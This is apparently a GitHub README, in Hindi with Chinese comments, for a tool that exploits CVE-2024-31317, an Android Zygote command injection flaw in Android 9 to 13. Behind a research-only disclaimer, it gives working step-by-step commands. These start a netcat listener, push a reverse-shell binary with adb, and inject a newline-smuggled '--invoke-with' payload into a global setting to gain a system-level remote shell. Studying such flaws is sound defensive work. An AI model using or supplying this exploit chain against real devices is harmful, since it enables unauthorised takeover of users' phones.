
CVE-2024-31317 Android Zygote कमांड इंजेक्शन भेद्यता अनुसंधान और तैनाती उपकरण | Android 9-13 भेद्यता शोषण ढांचा
यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग अनधिकृत परीक्षण के लिए करना अवैध है। लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
CVE-2024-31317 एक गंभीर सुरक्षा भेद्यता है जो Android 9 से Android 13 तक के उपकरणों को प्रभावित करती है, जो WRITE_SECURE_SETTINGS अनुमति वाले अनुप्रयोगों को कमांड इंजेक्शन के माध्यम से सिस्टम-स्तरीय अनुमति निष्पादन प्राप्त करने की अनुमति देती है। यह परियोजना इस भेद्यता का विस्तृत तकनीकी विश्लेषण, प्रूफ-ऑफ-कॉन्सेप्ट कोड और स्वचालित तैनाती उपकरण प्रदान करती है।
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# 启动监听器
nc -lvnp 4444
# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# 触发漏洞
adb shell stop && adb shell start
यह परियोजना केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग करने का अर्थ है कि आप सहमत हैं:
यह परियोजना MIT लाइसेंस के अंतर्गत है - विवरण के लिए LICENSE फ़ाइल देखें
fcy10012 - GitHub
संदर्भ परियोजना: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ यदि यह परियोजना आपके लिए उपयोगी है, तो कृपया इसे एक स्टार दें!